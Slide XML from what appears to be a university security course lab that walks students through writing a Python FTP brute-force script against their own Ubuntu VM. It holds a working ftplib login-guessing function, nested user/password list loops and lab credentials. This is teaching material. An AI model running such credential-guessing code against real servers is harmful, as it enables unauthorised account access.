          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    ftp = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftplib.FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return False</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285434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r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>I am a terrible coder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>But hey my stuff works… most of the time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4159167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FTP Brute Force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Your Ubuntu VM’s FTP server will also allow you to login with regular user credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>So you can login with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>user: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>enpm685</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3344884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FTP Brute Force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – list of users one per line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – list of passwords one per line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9627D988-835E-EA48-9337-4CFAD9FFA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11" y="2105714"/>
            <a:ext cx="5954787" cy="1323286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46C00A6-EFD5-8E4D-8880-D1542E669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410" y="4186236"/>
            <a:ext cx="5954787" cy="2310047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3001425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brute force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Supply a list of users and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>For each user in list check to see if list of passwords works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Nested for loops?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>If we have a match output = match!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Else = no match</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2139395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Python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pseudocode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlistfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "r")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>for users in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlistfile.readlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlistfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "r")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  for password in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlistfile.readlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    # brute force code here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    if we have results print them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2989846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625" y="241125"/>
            <a:ext cx="7739575" cy="6159675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp_brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname, user, password):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    ftp = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftplib.FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(user, password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlistfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "r”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>for users in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlistfile.readlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlistfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "r”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  for password in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlistfile.readlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Hint: “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()” after your user/pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> may help</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407887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 # brute force code here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1600200"/>
            <a:ext cx="8586788" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Print("\n" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftpsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> + ": Brute forcing FTP server...”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlistfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "r")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>for user in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userlistfile.readlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
